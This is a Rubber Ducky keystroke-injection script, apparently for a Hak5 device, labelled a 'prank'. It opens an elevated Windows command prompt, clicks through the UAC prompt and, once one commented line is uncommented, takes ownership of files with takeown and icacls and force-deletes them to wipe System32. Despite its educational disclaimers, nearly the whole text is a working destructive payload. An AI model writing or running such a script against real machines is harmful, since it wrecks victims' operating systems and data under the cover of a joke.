REM Title:32 wants the D REM Author: FalsePhilosopher REM Target: Win, tested on 10 REM Props: Hak5, my friends and memes REM Version: 1.0 REM Category: Prank REM D as in DELETE! Deletes System32. I wrote the draft with my friend as an educational lesson to show them just how easy it is to write ducky, I then combed through MS doc's on those 3 commands to refine them and tested later for this. REM REM THIS WILL DELETE THINGS AND MAKE COMPUTER UNHAPPY REM Uncomment out the string below to arm the script. REM Also... don't be a dick to n00bs. =) REM For educational/sysadmin purposes, as a reminder destruction of property IS A CRIME! REM As always just follow the golden rule "DON"T BE A DICK!" REM DELAY 500 GUI r DELAY 500 STRING cmd CTRL-SHIFT ENTER DELAY 2000 ALT y DELAY 1500 REM STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q * ENTER